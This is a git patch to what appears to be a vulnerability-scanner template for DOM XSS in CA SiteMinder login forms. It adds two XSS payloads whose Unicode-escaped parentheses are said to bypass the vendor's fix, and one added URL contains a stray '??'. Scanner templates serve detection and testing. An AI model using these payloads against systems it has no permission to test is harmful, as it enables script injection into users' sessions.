From 172368b74c4cab6310ff03429b1bcb23b2f1d209 Mon Sep 17 00:00:00 2001
From: mpatil-netspi <136427070+mpatil-netspi@users.noreply.github.com>
Date: Wed, 12 Feb 2025 15:50:20 +0530
Subject: [PATCH] Update DOM-XSS-SiteMinder.yaml

I have changed "(" and ")" to "U0028" and "U0029". I have bypassed the remediation.
---
 DOM-XSS-SiteMinder.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/DOM-XSS-SiteMinder.yaml b/DOM-XSS-SiteMinder.yaml
index 2868f2c..4321cdb 100644
--- a/DOM-XSS-SiteMinder.yaml
+++ b/DOM-XSS-SiteMinder.yaml
@@ -13,6 +13,8 @@ requests:
     path:
       - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
       - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
+      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7'
+      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc??USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm\u0028document.domain\u0029\u0022\u003e&SMAUTHREASON=7'
 
     matchers-condition: and
     matchers: